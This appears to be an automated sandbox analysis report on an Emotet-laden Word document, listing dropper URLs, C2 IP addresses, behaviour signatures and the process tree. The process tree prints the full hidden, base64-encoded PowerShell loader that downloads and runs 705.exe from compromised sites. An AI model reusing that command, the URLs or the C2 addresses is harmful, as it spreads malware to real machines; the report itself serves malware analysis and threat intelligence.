Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    16-01-2020 07:22

General

  • Target

    e834f6146588d6b07448da79aefa1f7340824c785f3585b397b78358a7e0a4a6

  • Sample

    200116-2dshf6qxpe

  • SHA256

    e834f6146588d6b07448da79aefa1f7340824c785f3585b397b78358a7e0a4a6

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://media.najaminstitute.com/zlnl4e/bygv89z/

exe.dropper

http://ektisadona.com/wp-includes/vq7/

exe.dropper

http://iiatlanta.com/wp-admin/joABbF/

exe.dropper

http://wotan.info/wp-content/jz5p/

exe.dropper

http://grayandwhite.com/wp-admin/9/

Extracted

Family

emotet

C2

24.196.49.98:80

93.147.141.5:443

72.189.57.105:80

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

27.109.153.201:8090

105.247.123.133:8080

190.12.119.180:443

120.151.135.224:80

221.165.123.72:80

103.86.49.11:8080

178.237.139.83:8080

5.32.55.214:80

95.213.236.64:8080

189.203.177.41:443

78.24.219.147:8080

190.117.226.104:80

73.11.153.178:8080

rsa_pubkey.plain

Signatures

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e834f6146588d6b07448da79aefa1f7340824c785f3585b397b78358a7e0a4a6.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4816
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABOAGUAZAB1AGEAegB5AG8APQAnAEUAdwBsAHYAYQBiAG8AZABsACcAOwAkAEEAdgBuAHYAdgB0AG8AbQAgAD0AIAAnADcAMAA1ACcAOwAkAFMAcQBwAHYAcgB2AG8AdQBrAHcAcAA9ACcAQwBhAHIAbQBiAHYAcgB3AHcAeQBkACcAOwAkAEgAZQBtAG0AYgB0AGcAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQB2AG4AdgB2AHQAbwBtACsAJwAuAGUAeABlACcAOwAkAFYAdABlAGwAYgB3AG4AeQBsAG4AZQBlAD0AJwBBAG8AdgBoAGcAcwBlAHgAJwA7ACQARgB6AGEAdABpAGEAdwBrAHIAZgBvAHkAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBFAGIAYwBsAGkARQBuAHQAOwAkAE8AYgBnAHoAaABmAGEAcQBtAD0AJwBoAHQAdABwADoALwAvAG0AZQBkAGkAYQAuAG4AYQBqAGEAbQBpAG4AcwB0AGkAdAB1AHQAZQAuAGMAbwBtAC8AegBsAG4AbAA0AGUALwBiAHkAZwB2ADgAOQB6AC8AKgBoAHQAdABwADoALwAvAGUAawB0AGkAcwBhAGQAbwBuAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHYAcQA3AC8AKgBoAHQAdABwADoALwAvAGkAaQBhAHQAbABhAG4AdABhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBqAG8AQQBCAGIARgAvACoAaAB0AHQAcAA6AC8ALwB3AG8AdABhAG4ALgBpAG4AZgBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGoAegA1AHAALwAqAGgAdAB0AHAAOgAvAC8AZwByAGEAeQBhAG4AZAB3AGgAaQB0AGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADkALwAnAC4AIgBzAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAUQBqAHcAdgBzAHcAcgBtAG0AegBhAHUAcQA9ACcAVABnAHIAcQBuAG0AaQB0AHMAcgBoAGEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAdgB0AHEAcgBmAHEAawBvAHoAagBlACAAaQBuACAAJABPAGIAZwB6AGgAZgBhAHEAbQApAHsAdAByAHkAewAkAEYAegBhAHQAaQBhAHcAawByAGYAbwB5AC4AIgBkAGAATwB3AG4AbABgAE8AQQBEAGAARgBpAGwARQAiACgAJABWAHYAdABxAHIAZgBxAGsAbwB6AGoAZQAsACAAJABIAGUAbQBtAGIAdABnAGcAKQA7ACQAUgBuAHgAcwBoAHUAcwB6AHMAZwBwAHcAcwA9ACcAQwBmAHkAdwBtAG4AbABtAGcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABIAGUAbQBtAGIAdABnAGcAKQAuACIATABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANQA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQBSAFQAIgAoACQASABlAG0AbQBiAHQAZwBnACkAOwAkAFEAZABkAGwAdgB6AHAAdgBsAD0AJwBJAGYAZAB1AG4AbABiAHIAJwA7AGIAcgBlAGEAawA7ACQATABxAGwAaQBlAGYAagBmAGIAcQBmAD0AJwBDAHYAbwB1AHQAdwBkAHcAeAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAagBzAHgAYgBmAHcAcABxAGYAbgA9ACcAUgB1AGYAcABrAG0AdwBrACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:4376
    • C:\Users\Admin\705.exe
      "C:\Users\Admin\705.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Users\Admin\705.exe
        --4730b01a
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:4516

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\705.exe

  • C:\Users\Admin\705.exe

  • C:\Users\Admin\705.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/4500-7-0x0000000002260000-0x0000000002277000-memory.dmp

    Filesize

    92KB

  • memory/4516-10-0x00000000005F0000-0x0000000000607000-memory.dmp

    Filesize

    92KB

  • memory/4516-11-0x0000000000400000-0x0000000000485000-memory.dmp

    Filesize

    532KB